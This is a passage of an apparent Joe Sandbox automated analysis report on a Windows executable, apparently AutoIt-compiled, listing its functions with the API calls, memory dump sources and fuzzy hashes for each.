                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2223660684-0
                                                                          • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                          • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                          • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                          • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                          Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                          • LineTo.GDI32(?,?,?), ref: 00447326
                                                                          • EndPath.GDI32(?), ref: 00447336
                                                                          • StrokePath.GDI32(?), ref: 00447344
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                          • String ID:
                                                                          • API String ID: 2783949968-0
                                                                          • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                          • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                          • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                          • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                          Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                          • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 2710830443-0
                                                                          • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                          • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                          • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                          • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                          Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                            • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                            • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                          • String ID:
                                                                          • API String ID: 146765662-0
                                                                          • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                          • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                          • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                          • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                          Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00472B63
                                                                          • GetDC.USER32(00000000), ref: 00472B6C
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                          • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                          • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                          • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                          Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00472BB2
                                                                          • GetDC.USER32(00000000), ref: 00472BBB
                                                                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                          • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                          • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                          • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                          Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd_noexit.LIBCMT ref: 00415150
                                                                            • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                            • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                            • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                            • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                            • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                          • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                          • __freeptd.LIBCMT ref: 0041516B
                                                                          • ExitThread.KERNEL32 ref: 00415173
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1454798553-0
                                                                          • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                          • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                          • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                          • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                          Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _strncmp
                                                                          • String ID: Q\E
                                                                          • API String ID: 909875538-2189900498
                                                                          • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                          • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                          • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                          • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                          Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                          • String ID: AutoIt3GUI$Container
                                                                          • API String ID: 2652923123-3941886329
                                                                          • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                          • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                          • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                          • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                          Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove_strncmp
                                                                          • String ID: U$\
                                                                          • API String ID: 2666721431-100911408
                                                                          • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                          • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                          • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                          • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                          Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • __wcsnicmp.LIBCMT ref: 00467288
                                                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                          • String ID: LPT
                                                                          • API String ID: 3035604524-1350329615
                                                                          • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                          • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                          • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                          • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                          Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \$h
                                                                          • API String ID: 4104443479-677774858
                                                                          • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                          • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                          • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                          • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                          Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID: &
                                                                          • API String ID: 2931989736-1010288
                                                                          • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                          • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                          • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                          • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                          Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          • API String ID: 4104443479-2967466578
                                                                          • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                          • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                          • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                          • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                          Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00466825
                                                                          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
